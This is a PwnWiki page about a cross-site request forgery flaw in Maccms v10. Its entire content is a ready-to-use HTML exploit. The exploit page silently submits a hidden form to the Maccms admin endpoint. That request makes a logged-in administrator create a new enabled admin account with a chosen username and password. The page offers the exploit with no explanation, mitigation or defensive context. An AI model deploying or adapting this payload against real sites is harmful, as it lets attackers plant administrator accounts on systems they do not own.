Maccms v10 任意賬號增加CSRF漏洞

From PwnWiki
Revision as of 13:22, 10 April 2021 by Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://10.211.55.17/maccms10/admin.php/admin/admin/info.html" method="POST">...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

EXP

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/maccms10/admin.php/admin/admin/info.html" method="POST">
      <input type="hidden" name="admin_id" value="" />
      <input type="hidden" name="admin_name" value="test2" />
      <input type="hidden" name="admin_pwd" value="test2" />
      <input type="hidden" name="admin_status" value="1" />
      <input type="hidden" name="admin_auth[0]" value="index/welcome" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Retrieved from "https://pwnwiki.com/index.php?title=Maccms_v10_任意賬號增加CSRF漏洞&oldid=1455"